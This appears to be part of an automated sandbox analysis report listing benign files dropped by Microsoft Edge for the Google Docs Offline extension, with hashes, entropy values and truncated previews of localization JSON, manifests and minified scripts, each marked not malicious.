                                                                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11280
                                                                                                                                                                                                                                                      Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                      MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                      SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                      SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                      SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                      Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                      MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                      SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                      SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                      SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):98880
                                                                                                                                                                                                                                                      Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                      MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                      SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                      SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                      SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):107677
                                                                                                                                                                                                                                                      Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                      MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                      SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                      SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                      SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                      Malicious:false
